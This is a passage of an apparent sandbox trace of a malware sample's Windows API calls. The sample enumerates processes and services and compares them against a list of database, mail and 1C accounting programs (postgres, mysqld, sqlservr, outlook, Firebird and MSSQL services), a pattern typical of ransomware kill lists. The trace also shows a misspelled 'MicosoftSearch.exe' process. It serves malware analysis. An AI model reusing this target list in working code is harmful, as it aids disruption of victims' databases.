lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0273.900] Process32NextW (in: hSnapshot=0x390, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0273.900] lstrlenW (lpString="csrss.exe") returned 9 [0273.901] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0273.901] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0273.901] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0273.901] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0273.901] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0273.901] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0273.901] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0273.901] Process32NextW (in: hSnapshot=0x390, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0273.901] lstrlenW (lpString="wininit.exe") returned 11 [0273.901] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0273.901] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0273.901] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0273.901] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0273.901] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0273.901] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0273.901] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0273.901] Process32NextW (in: hSnapshot=0x390, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0273.901] lstrlenW (lpString="csrss.exe") returned 9 [0273.901] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0273.901] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0273.902] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0273.902] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0273.902] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0273.902] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0273.902] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0273.902] Process32NextW (in: hSnapshot=0x390, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0273.902] lstrlenW (lpString="winlogon.exe") returned 12 [0273.902] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0273.902] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0273.902] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0273.902] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0273.902] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0273.902] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0273.902] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0273.902] Process32NextW (in: hSnapshot=0x390, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0273.902] lstrlenW (lpString="services.exe") returned 12 [0273.902] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0273.902] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0273.902] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0273.903] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0273.903] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0273.903] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0273.903] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0273.903] Process32NextW (in: hSnapshot=0x390, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x180, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0273.903] lstrlenW (lpString="lsass.exe") returned 9 [0273.903] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0273.903] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0273.903] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0273.903] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0273.903] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0273.903] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0273.903] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0273.903] Process32NextW (in: hSnapshot=0x390, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0273.903] lstrlenW (lpString="lsm.exe") returned 7 [0273.903] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0273.903] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0273.903] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0273.903] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0273.903] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0273.904] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0273.904] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0273.904] Process32NextW (in: hSnapshot=0x390, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.904] lstrlenW (lpString="svchost.exe") returned 11 [0273.904] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0273.904] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0273.904] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0273.904] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0273.904] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0273.904] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0273.904] Process32NextW (in: hSnapshot=0x390, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.904] lstrlenW (lpString="svchost.exe") returned 11 [0273.904] Process32NextW (in: hSnapshot=0x390, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.905] lstrlenW (lpString="svchost.exe") returned 11 [0273.905] Process32NextW (in: hSnapshot=0x390, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.905] lstrlenW (lpString="svchost.exe") returned 11 [0273.905] Process32NextW (in: hSnapshot=0x390, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.905] lstrlenW (lpString="svchost.exe") returned 11 [0273.905] Process32NextW (in: hSnapshot=0x390, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0273.906] lstrlenW (lpString="audiodg.exe") returned 11 [0273.906] Process32NextW (in: hSnapshot=0x390, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.906] lstrlenW (lpString="svchost.exe") returned 11 [0273.906] Process32NextW (in: hSnapshot=0x390, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.906] lstrlenW (lpString="svchost.exe") returned 11 [0273.906] Process32NextW (in: hSnapshot=0x390, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0273.907] lstrlenW (lpString="userinit.exe") returned 12 [0273.907] Process32NextW (in: hSnapshot=0x390, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x340, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0273.907] lstrlenW (lpString="dwm.exe") returned 7 [0273.907] Process32NextW (in: hSnapshot=0x390, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x448, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0273.907] lstrlenW (lpString="explorer.exe") returned 12 [0273.907] Process32NextW (in: hSnapshot=0x390, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0273.907] lstrlenW (lpString="spoolsv.exe") returned 11 [0273.907] Process32NextW (in: hSnapshot=0x390, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0273.908] lstrlenW (lpString="taskhost.exe") returned 12 [0273.908] Process32NextW (in: hSnapshot=0x390, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.908] lstrlenW (lpString="svchost.exe") returned 11 [0273.908] Process32NextW (in: hSnapshot=0x390, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0273.908] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0273.908] Process32NextW (in: hSnapshot=0x390, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0273.909] lstrlenW (lpString="reader_sl.exe") returned 13 [0273.909] Process32NextW (in: hSnapshot=0x390, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0 [0273.909] CloseHandle (hObject=0x390) returned 1 [0273.909] Sleep (dwMilliseconds=0x1f4) [0275.874] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x47ea330 [0275.884] EnumServicesStatusExW (in: hSCManager=0x47ea330, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 0 [0275.884] GetLastError () returned 0xea [0275.884] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xe90) returned 0x3dec5a0 [0275.884] EnumServicesStatusExW (in: hSCManager=0x47ea330, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3dec5a0, cbBufSize=0xe90, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3dec5a0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 1 [0275.885] CloseServiceHandle (hSCObject=0x47ea330) returned 1 [0275.885] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0275.885] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0275.885] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0275.885] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0275.885] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0275.885] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0275.885] lstrlenW (lpString="AudioSrv") returned 8 [0275.885] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0275.885] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0275.885] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0275.885] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0275.885] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0275.885] lstrlenW (lpString="BFE") returned 3 [0275.885] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0275.885] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0275.885] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0275.885] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0275.885] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0275.885] lstrlenW (lpString="CryptSvc") returned 8 [0275.885] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0275.885] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0275.886] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0275.886] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0275.886] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0275.886] lstrlenW (lpString="CscService") returned 10 [0275.886] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0275.886] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0275.886] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0275.886] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0275.886] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0275.886] lstrlenW (lpString="DcomLaunch") returned 10 [0275.886] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0275.886] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0275.886] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0275.886] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0275.886] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0275.886] lstrlenW (lpString="Dhcp") returned 4 [0275.886] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0275.886] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0275.886] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0275.886] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0275.886] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0275.886] lstrlenW (lpString="Dnscache") returned 8 [0275.886] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0275.886] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0275.886] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0275.887] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0275.887] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0275.887] lstrlenW (lpString="DPS") returned 3 [0275.887] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0275.887] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0275.887] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0275.887] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0275.887] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0275.887] lstrlenW (lpString="eventlog") returned 8 [0275.887] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0275.887] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0275.887] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0275.887] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0275.887] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0275.887] lstrlenW (lpString="EventSystem") returned 11 [0275.887] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0275.887] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0275.887] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0275.887] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0275.887] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0275.887] lstrlenW (lpString="gpsvc") returned 5 [0275.887] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0275.887] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0275.887] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0275.887] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0275.887] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0275.887] lstrlenW (lpString="iphlpsvc") returned 8 [0275.887] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0275.887] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0275.887] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0275.887] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0275.887] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0275.887] lstrlenW (lpString="LanmanServer") returned 12 [0275.887] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0275.888] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0275.888] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0275.888] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0275.888] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0275.888] lstrlenW (lpString="LanmanWorkstation") returned 17 [0275.888] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0275.888] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0275.888] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0275.888] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0275.888] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0275.888] lstrlenW (lpString="lmhosts") returned 7 [0275.888] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0275.888] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0275.888] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0275.888] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0275.888] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0275.888] lstrlenW (lpString="MMCSS") returned 5 [0275.888] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0275.888] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0275.888] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0275.888] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0275.888] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0275.888] lstrlenW (lpString="MpsSvc") returned 6 [0275.888] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0275.888] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0275.888] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0275.888] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0275.888] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0275.888] lstrlenW (lpString="NlaSvc") returned 6 [0275.888] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0275.888] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0275.888] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0275.888] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0275.889] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0275.889] lstrlenW (lpString="nsi") returned 3 [0275.889] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0275.889] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0275.889] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0275.889] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0275.889] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0275.889] lstrlenW (lpString="PcaSvc") returned 6 [0275.889] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0275.889] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0275.889] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0275.889] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0275.889] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0275.889] lstrlenW (lpString="PlugPlay") returned 8 [0275.889] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0275.889] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0275.889] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0275.889] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0275.889] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0275.889] lstrlenW (lpString="Power") returned 5 [0275.889] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0275.889] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0275.889] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0275.889] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0275.889] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0275.889] lstrlenW (lpString="ProfSvc") returned 7 [0275.889] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0275.889] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0275.889] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0275.889] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0275.889] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0275.889] lstrlenW (lpString="RpcEptMapper") returned 12 [0275.889] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0275.890] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0275.890] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0275.890] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0275.890] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0275.890] lstrlenW (lpString="RpcSs") returned 5 [0275.890] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0275.890] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0275.890] lstrcmpiW 